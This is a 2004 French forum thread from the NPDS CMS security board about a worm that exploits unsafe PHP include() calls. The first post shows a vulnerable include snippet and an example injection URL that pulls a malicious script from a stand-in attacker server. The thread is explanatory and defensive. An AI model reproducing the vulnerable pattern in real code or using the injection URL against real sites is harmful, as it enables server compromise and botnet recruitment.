Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !
  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !
  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » [Résolu] - Après le ver qui s'attaque à phpbb2... voici...
Auteur[Résolu] - Après le ver qui s'attaque à phpbb2... voici...
Cats
75    

Cats
  Posté : 27-12-2004 05:14

Le nouveau ver Php!include!.Worm se propage activement sur internet, il s'attaque à toute page dynamique non sécurisée. [Ce ver est détecté par certains antivirus comme étant la variante C ou E de Santy. Nous estimons que ce ver est totalement différent de la famille Santy (la seule similitude réside dans l'utilisation des moteurs de recherche), nous avons donc décidé de lui attribuer l'alias "Php!include!.Worm"].

Contrairement à Santy, Php!include!.Worm n'exploite pas les vulnérabilités phpBB, il exploite une palette plus large de failles dites "de programmation". Il recherche (via Google/Yahoo/AOL) des serveurs web dont les pages php utilisent les fonctions "!include!()" et "require()" de façon non-sécurisée. Comment ?


Ces fonctions sont normalement utilisées par les programmeurs afin d'inclure des pages web spécifiées en arguments. Malheureusement, la non vérification de ces arguments peut permettre l'inclusion et l'exécution de fichiers externes, et donc la compromission du serveur web :

-------- Exemple : vulnerable.php --------
if(isset($page))
{
!include!($page);
}
-----------------------------------------------

La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

Php!include!.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.

Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé par K-OTik Security.

Sources : k-otik

Qu'en est-il de NPDS ?

  Profil  www  
webservor
1856       
 

webservor
  Posté : 27-12-2004 08:57

je sais que la fct !include!() est très sécurisée dans NPDs / dev ?

  Profil  
Fix
624      
 

Fix
  Posté : 27-12-2004 14:24

sur npds ok mais dans les modules, y'a pas des !include!s tout frais tout dispo pour les hackers?

ceci dit, il faut aussi tomber sur la bonne variable, on utilise pas forcement $page

  Profil  E-mail  www  
Cats
75    

Cats
  Posté : 27-12-2004 14:31

Yep, mais je répète : Php!!include!!.Worm recherche des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies... et ça, ça ne manque pas !!!

  Profil  www  
developpeur
24581       
 

developpeur
  Posté : 27-12-2004 21:38

un filtre activé sur npds.org sera bientot publié pour "contrer" cette petite bête !

Ceci étant santy.c surcharge beaucoup la machina ... et c'est pas cool non plus

  Profil  E-mail  www  
Sauter à :

Temps : 0.0209 seconde(s)